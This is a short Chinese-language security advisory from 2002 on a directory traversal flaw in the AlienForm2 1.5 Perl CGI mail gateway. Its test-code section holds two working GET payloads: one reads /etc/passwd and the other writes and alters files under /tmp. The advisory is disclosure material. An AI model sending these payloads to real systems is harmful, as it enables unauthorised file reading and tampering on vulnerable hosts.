AlienForm2存在目录遍历漏洞发布时间:2002-06-13 更新时间:2002-06-13 严重程度:中 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:4983 受影响系统 Jon Hedley AlienForm2 1.5详细描述 AlienForm2是由PERL编写的邮件网关接口。 其中存在目录遍历漏洞,可导致用户访问主机上的任意文件并存在修改任意文件内容的可能,这可以通过使用'.|.%2F'字符来构早文件路径来完成。 测试代码 GET /cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F .|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd GET /cgi-bin/af.cgi?_out_file=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|. %2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Ftmp%2Fpasswd&x9|^root.*|x9=.|.%2F.|. %2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Ftmp%2Ffoo&x9|^http d.*|x9=hello+there&x9|^nobody.*%0A|x9= 解决方案 尚无 相关信息 Nick Cleaton <nick@cleaton.net>. 参考:http://online.securityfocus.com/archive/1/276248 相关主页:http://cgi.tj/scripts/alienform/ |
